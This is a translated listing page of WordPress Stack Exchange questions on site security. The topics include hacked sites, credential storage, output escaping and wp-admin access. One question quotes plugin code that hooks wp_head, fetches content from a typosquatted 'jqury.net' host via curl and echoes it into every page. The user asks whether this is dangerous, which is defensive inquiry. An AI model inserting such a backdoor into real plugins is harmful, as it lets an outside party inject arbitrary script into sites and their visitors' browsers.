Perguntas com a marcação «security»

Fechadas. Esta questão está fora de tópico . No momento, não está aceitando respostas. Deseja melhorar esta pergunta? Atualize a pergunta para que ela esteja no tópico do WordPress Development Stack Exchange. Fechado há 4 anos . Eu instalei o plugin Simple Login Lockdown e, há alguns dias, o banco …

20 login  security 

Eu tive um cliente que foi hackeado recentemente e notei que havia caracteres estranhos aparecendo no site dela, como  e Æ. Acontece que os hackers alteraram o blog_charset para UTF-7 na wp_optionstabela no banco de dados. Voltei a configurá-lo para UTF-8, mas fiquei imaginando se, durante o período em …

19 security  encoding  hacked  characters 

Eu sou novo no WordPress. Li recentemente um artigo sobre como hackers podem explorar vulnerabilidades em plugins. Várias fontes, como o Google Pagespeed, também me dissuadiram de usar plug-ins ou pelo menos o mantiveram no mínimo. Pessoalmente, também tento evitar plugins porque me sinto mais no controle do que acontece …

19 plugins  security 

No momento, estou desenvolvendo um plug-in e as chances são de que provavelmente o lançarei no repositório público de plugins para que outros possam usá-lo. O plug-in usará uma API e, para usá-la, é necessário passar um nome de usuário e senha. Portanto, meu plug-in precisa armazenar essas credenciais de …

19 plugin-development  security  api  encryption 

Encontrei isso em um plugin. O que isso faz? é perigoso? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

Quero garantir que todos os dados nos meus plugins / temas sejam tratados com segurança antes de entrar no banco de dados e antes de serem enviados ao navegador. Meu problema é que há situações em que a API lida com a higienização para você - como ao salvar os …

17 plugin-development  security  customization  validation  sanitization 

A manutenção wp-admin/install.phpe wp-admin/install-helper.phpum vazamento de segurança nas versões mais recentes do wordpress? Por padrão, a permissão de arquivo nesses arquivos é 644. Se houver algum vazamento, que tipo de favor?

16 security  installation 

Atualmente, essa questão não se encaixa no nosso formato de perguntas e respostas. Esperamos que as respostas sejam apoiadas por fatos, referências ou conhecimentos, mas essa pergunta provavelmente solicitará debates, argumentos, pesquisas ou discussões prolongadas. Se você acha que essa pergunta pode ser melhorada e possivelmente reaberta, visite o centro …

16 plugins  plugin-development  security  sql 

Vejo que os SVGs são bloqueados por padrão no carregador de mídia e você deve adicioná-lo como um tipo MIME suportado em functions.php. Que razões de segurança estão por trás disso?

15 media  security  svg 

Eu tinha olhado para o código, mas não consegui ver nenhum escape de funções como the_title the_content the_excerptetc. Talvez eu não esteja lendo direito. Preciso escapar dessas funções no desenvolvimento de temas como: esc_html ( the_title () ) Editar: conforme indicado nas respostas abaixo, o código acima está errado, independentemente …

15 security  escaping 

Estamos tendo alguns problemas com um desenvolvedor externo. Queremos limitar o acesso ao wp-adminsite apenas ao acesso interno (via VPN ). Simplesmente para que não seja atacado por usuários externos. Podemos enumerar os administradores do site e não queremos que eles sejam fraudados. Nosso desenvolvedor está dizendo que não podemos …

14 admin  ajax  security 

Apenas uma pergunta rápida que pode ajudar um pouco com a segurança. Notei que o arquivo readme.html tem o número da versão listado. Ele reaparece após cada atualização e o licence.txt e wp-config-sample.php. Existe uma maneira fácil de o WordPress remover automaticamente esses arquivos após uma atualização? Eu já bloqueio …

13 security  wp-config 

Configurar o WordPress para atualizar dentro do aplicativo (ou seja, WordPress) é ideal para mim devido à sua conveniência. No entanto, estou preocupado com os requisitos. Os campos solicitados que aparecem após a instalação do ssh2 para php solicitam não apenas minha chave pública, mas também minha chave privada. Eu …

13 security  updates  ssh 

Observando o Codex para wp_insert_post (), ele afirma que esta função "... higieniza variáveis, faz algumas verificações, preenche variáveis ​​ausentes como data / hora etc." (EDIT: Atualizei a entrada do Codex para incluir um exemplo mais robusto que inclui segurança, além de atribuição de meta e categoria) Apenas me pergunto …

13 security  sanitization 

Essa coisa dificulta minha codificação. O codex do Wordpress justifica o uso do esc_url falando vagamente sobre segurança. Mas vale realmente a pena? Por exemplo, qual é o importante e prático benefício de segurança usando <?php echo esc_url( home_url( '/' ) ); ?> ao invés de <?php echo home_url() ?> …

12 security